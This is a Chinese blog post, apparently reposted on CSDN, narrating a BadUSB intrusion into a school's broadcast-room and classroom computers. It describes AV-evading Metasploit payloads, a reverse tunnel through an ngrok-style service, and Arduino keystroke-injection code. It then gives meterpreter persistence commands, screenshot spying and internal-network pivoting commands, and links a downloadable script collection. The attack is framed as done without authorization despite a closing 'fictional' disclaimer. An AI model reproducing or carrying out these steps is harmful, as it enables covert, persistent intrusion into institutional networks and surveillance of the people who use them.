badusb代码_携Badusb进校园的系列测试

最新推荐文章于 2024-09-14 23:40:40 发布
最新推荐文章于 2024-09-14 23:40:40 发布
阅读量208 收藏 3
点赞数
文章标签: badusb代码

原创 Scan 合天智汇

本文所用到的工具:

  • Badusb
  • Ngrok
  • Arduino
  • Msfconsole
  • Msfvenom
  • 迷你相机

0x01蓄谋已久的前言

每次上楼时,都能看见广播室门开得非常宽

c6dd0d80782b9ce5d5858cf9145a4385.png

但这不是重点,重点是里面的电脑(WindowsXP),电脑桌面上是LED大屏幕的编辑软件。

22aaad2764adf428e524a979166c41ee.png

二楼有个网络管理箱并由管道内的网线传输到每个教室的多媒体(Windows10)。

83503217a55c5ad7f93424b61eafc815.png

看看兜里的Badusb,突然就散发出了浓浓的香味,哧溜~~~。

俗话说“艺高人胆大”,但吾也要:武艺不高强,菜鸟也先飞!

14d20fd0296a8df29148e88909920ba4.png

0x02分析并整理收集到的信息

主机

系统

杀毒软件

网络状态

广播室

Windows XP

不详

不详

多媒体

Windows 10

Defender、360

正常

而且我们从二楼的网络管理箱分支网线的管道可推断出二楼所有教师的多媒体属于同一内网。我们在烧录代码的时候,就要根据不同的系统版本,网络状态,杀毒软件等因素来进行烧录。为什么说广播室的具体信息我们获取不到呢?因为“可远观,而不可亵玩焉。”

ef0392b8ae825b9e07659c95973947fc.png

0x03部署Payload及规避模块到Ngrok

首先我们使用规避模块生成一个WindowsEXE文件来规避WindwosDefender程序,操作如下:

showevasuib

a4d57ab429d616963f543d590452c310.png
ca01fde162f5c25cf5af261cf05a91e1.png
2405e4f51fa8a029c3c713afed3ad770.png

接着run可以看到生成的FILENAME(文件名是随机的)

当然也可以自定义SetFILENAME 文件名即可

生成的文件保存到了

/root/.msf4/local/yZdsypg.exe

接下来我们来部署反弹环境,在这里来注册一个账户

登录后来到后台页面点击

e1a205efd8f8f231e5965a6e75f3af5b.png

当然也有免费的隧道,不过网速较慢,根据自己的情况而定!

5cd4bb20f682953f67e3b12e837e6237.png

接着我们点击立即购买,会跳转到隧道配置的页面,如图:

e66111b60d1c3f09c22c8abf03800541.png

使用ping服务器地址命令,找到IP地址。

1c935af4f8f820b7a0f1939e672884e6.png

接着我们打开刚解压下来的文件夹

输入./sunnyclientid 填写你的隧道ID

f7d3e7e5ecac565df2faac578b60fb01.png

出现这个界面就代表隧道连接成功!

53059499c07984fae59a38625d3984bf.png

接着我们用Msfvenom生成可执行文件,代码如下

c4c4abc838c2751bf8b726d7c028feeb.png

注:如果是64位系统,Payload则更改为:windows/x64/meterpreter/reverse_tcp对于小白很陌生带两个值是可以实现自动迁移进程的功能,关闭其中一进程并不影响另一进程。

-k选项并不适用于所有模板,请提前做好测试。

实验:MSFvenom实践

http://www.hetianlab.com/expc.do?ec=ECID9db0-7e22-486f-a628-023583616a83(通过该实验了解msfvenom和metasploit的用法)

987ef686899ec7d2c1ff9685dcab8654.png

0x04安装Arduino

首先我们打开arduino安装包

da0eaa7ed20c110b6f79c7b85f36bce8.png
8f4d13ca696fd2428d5f9cc305b19ea6.png
b8767fa661d80e0319f327bed5ba9922.png
821af86ffb131a14440a041563e28d2d.png
07e1856498b7e660376677363c68553a.png

完成了安装。

配置如下:

51e3234f54337842fc1112ecd5bc247e.png

完成安装。

346a20342771f2a11dec4bbc894d0593.png

0x05烧录代码

代码贴出:

6b907253ceed928f9e02bb02159dce11.png
73b322865917365bc3c498fa45d7c23e.png

更多代码在文章底部有相关信息,不要着急!

编译好之后我们直接上传即可完成烧录,直接点击上传可以检查编译并上传。

0x06Shell快到碗里来

cf6dbcccedf818abc550733209a56cec.png

让基友给我代插烧鹅:

2b3d059ae911215a762757ee41f76d14.png

如图:

37aadc91eba5db4277e0d9a4ee5cfc8f.png

我们已经获取到了Meterpreter会话,现在我们可以为所欲为了!

为了防止亡羊补牢,要一劳永逸,我们先添加一个持久后门,命令如下:

runpersistence -X -i 5 -p 端口-rIP

or

runmetsvc

第二种方法直接监听即可,具体方法找谷哥和度娘。

e8ec8ce90177664b754c56a32b4d0d30.png

附带一张屏幕截图:

screenshot

40d7484c60df16e355569805d29a2f7e.png

打开偷窥一下:

f6e010610c44dedea3ca00afb55b000c.png

实验:Metasploit制作木马后门

http://www.hetianlab.com/expc.do?ec=ECID1932-04d9-4856-88c7-e02fb889edd3(通过实验来亲手使用meterpreter留nc后门)

0x07内网漫游

4e92ce30ac2f2083ebfb5d81e512eb8e.png

查看子网:runget_local_subnets

添加路由:routeadd 子网掩码 会话id

查看路由:routeprint

自动化添加路由:loadauto_add_route

fdf97ead16140785e4251d6fb2cbbc29.png

额.......好吧得退出meterpreter会话,因不可描述因素,就这样吧。

提示得运行一个Post模块,并且添加参数,大家明白就好。

设置完毕后接下来就看自己的操作了,

广播室也被搞定,也是因不可描述规章制度等原因不再继续。正文到此结束。

总结:

1.要提前知晓操作系统。

2.根据不同的系统要构造不同的Payload。

3.采用多种可执行后缀(bat、exe、docx)。

4.获取Shell要第一时间添加后门。

5.不推荐使用Ngrok,自行百度其他平台,但使用方法基本一致。

6.添加完路由如果有网络异常状态,则删除路由条目。

代码以烧录器整理集合如下:

(均来自互联网、适用与否请提前在虚拟机测试)

打开烧录脚本软件,点击文件--打开即可。

链接:https://pan.baidu.com/s/17UCyKosBkjCRb7IBfxfdPg

提取码:btmz

声明:本文仅供参考,内容仅为虚构,代码以及使用方法切勿使用于非法用途!

weixin_39814482
关注
badusb代码daquan.zip
06-22
badusb代码daquan.zip
BadUsb程序大全-值得收藏
门柚的博客
07-31 1720
BadUsb程序大全-值得收藏
【近源攻击badusb制作
最新发布
qinjilll的博客
09-14 1208
BadUSB是利用伪造HID设备执行攻击载荷的一种攻击方式。HID(Human InterfaceDevice)设备通常指的就是键盘鼠标等与人交互的设备,用户插入BadUSB,就会自动执行预置在固件中的恶意代码BadUsb插入后,会模拟键盘鼠标对电脑进行操作,通过这些操作打开电脑的命令终端,并执行一条命令,这条命令将从指定网址下载其他代码并于后台静默运行。这些代码功能包括:窃取信息、反弹shell、发送邮件等,从而实现控制目标机或者窃取信息的目的。
BadUsb使用
问题很多的小明
05-04 1085
学习BadUS
badusb代码_badusb攻击代码
weixin_39887183的博客
11-28 2500
badusb攻击(msfconsole)准备badusbArduino下载软件点击下载运行软件在工具菜单中 选择,选择badusb的端口和开发版。注入代码windows10系统#includevoidsetup(){Keyboard.begin();//开始键盘通讯delay(1000);//延时Keyboard.press(KEY_LEFT_GUI);//win键delay(50...
USB攻击系列BadUSB实现CS上线和反弹shell
m0_59598029的博客
08-04 418
我们发现BadUSB在linux和macos上不需要过免杀,但是无法通过windows上的杀软,于是有了以下的研究。BadUSB硬件和Arduino软件(https://www.arduino.cc/en/software)打开Arduino的ide工具,选择端口选中Arduino开发板编辑windows测试脚本,启动cmd命令行,实现whoami,编译上传随即成功执行whoami,基础的模拟键盘的操作,杀软是通过的,但是一旦有恶意行为,杀软会自动查杀并阻止。
badusb.zip_bad usb_badusb_badusb下载_badusb制作教程_badusb脚本开发
09-21
1. **Bad_USB**: 这是BadUSB的缩写,指的是利用USB设备进行恶意活动的技术。 2. **badusb**: 这可能是工具的名称,或者与BadUSB相关的项目代号。 3. **badusb下载**: 表明该压缩包可能包含BadUSB相关的软件或工具的...
BadUsb资料.zip_BADUSB 文件下载_away_badusb驱动_eitherofo_televisionw8e
09-23
【标题】"BadUsb资料.zip_BADUSB 文件下载_away_badusb驱动_eitherofo_televisionw8e" 涉及的是关于BadUSB漏洞利用和防护的相关资源集合。BadUSB是一种安全漏洞,它允许攻击者通过USB设备篡改硬件功能,将其转变为...
badusb_badusb_
09-29
【标题】:“badusb_badusb_”:深入理解BadUSB及其威胁 【描述】:“badusb资料,需要自行打包带走” 提示了本压缩包包含了关于BadUSB的相关研究和资料,BadUSB是一种针对USB设备的恶意攻击手段,它利用USB设备的...
badusb代码.zip
07-25
【标题】:“badusb代码.zip”是一个包含BadUSB攻击工具源代码的压缩文件,它提供了对USB设备进行恶意操作的程序。BadUSB是一种利用USB设备固件漏洞的技术,可以让攻击者将USB设备伪装成其他设备,如键盘、网络...
利用badusb对用户进行木马远控
ghtwf01的博客
12-01 2189
文章首发先知社区:https://xz.aliyun.com/t/6386 最近接触到利用badsub进行攻击的方法,于是自己研究了一波,先给出一个badusb木马远控案例。 badusb简介 badusb是一种类似于U盘,插入后就会自动执行里面的恶意代码进行恶意操作,由于恶意代码是存在badusb存放固件的区域中,所以杀毒软件和U盘格式化都不能防御badusb攻击 badusb基本语法和arduino按键代码 入门badusb参考视频教程:https://www.bilibili.com/video/a
使用kali nethunter执行badUSB攻击--基于Rucky工具
geek-7的博客
04-14 2180
使用kali net hunter的rucky工具进行HID攻击。含攻击脚本语法及范文,攻击思路。
badusb详细制作教程(两种方式实现远控)
Ghost_system的博客
08-17 1万+
badusb是一种几乎可以突破任何杀毒软件和防火墙的设备,堪称渗透测试利器 文章目录前言一、什么是badusb?二,badusb的优点三,badusb是如何攻击的?badusb原理HID攻击漏洞产生原因三、准备步骤1.设备2,编辑器的安装与设置四,编写代码(重点)第一种: SEToolkit + badusb实现PowerShell注入攻击第二种:Cobalt Strike + badusb 实现PowerShell注入攻击五,烧录六,badusb有多强大攻击场景总结 BadUSB是《黑客军团》中
基于Arduino Leonardo的进阶Badusb(Python+SMTP)
zbp_12138的博客
12-24 1920
今天要做的badusb跟上一期比,不太一样的地方是,我加了一个发送邮件的功能,具体来说,就是插入开发板以后,程序自动把该机器的ip地址获取下来,并以邮件的形式发送给指定的收件人.先来看看效果吧: 进阶版BADUSB操作演示 为了让大家看的比较清楚,我没有加入隐藏的功能,这个功能...
曾经很火的BADUSB测试记录
imtech的博客
10-11 1332
攻击者将恶意代码存放于Badusb的固件中,PC上的杀毒软件无法访问到U盘存放固件的区域,因此也就意味着杀毒软件无法应对BadUSB攻击
从零开始学badusb(2)--badusb调用命令行
azraelxuemo的博客
05-28 2005
上一节初步接触了badusb,这节我们学习一下怎么调用cmd 首先是简易版的 #include <Keyboard.h> void setup() { Keyboard.begin(); delay(1000); Keyboard.press(KEY_LEFT_GUI); delay(500); Keyboard.print("r"); delay(500); Keyboard.release(KEY_LEFT_GUI); delay(500); Keyboard.pr
插一个U盘黑一台电脑-Badusb最详细制作教程
热门推荐
J0o1ey Blog
08-01 2万+
0x001-简介 1.概述 在2014年美国黑帽大会上,安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”的攻击方法,这种攻击方法让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当危险的状态。...
badusb代码_BadUSB联动Msf
weixin_39906358的博客
11-28 632
最近对BadUSB比较感兴趣,所以就买了两块开发板玩玩。一个是Digispark,一个是Leonardo,某宝上都有卖,十块二十块左右,容易上手,作为初学工具还是比较合适的。它们分别长这个样子: Digispark开发板...
BadUSB资料下载:驱动与工具包打包指南
资源摘要信息: "BadUSB资料.zip_BADUSB 文件下载_away_badusb驱动_eitherofo_televisionw8e" 1. BadUSB概念: BadUSB是一种攻击向量,它利用了USB设备的固件可编程性。通过将USB设备固件修改为恶意代码攻击者可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值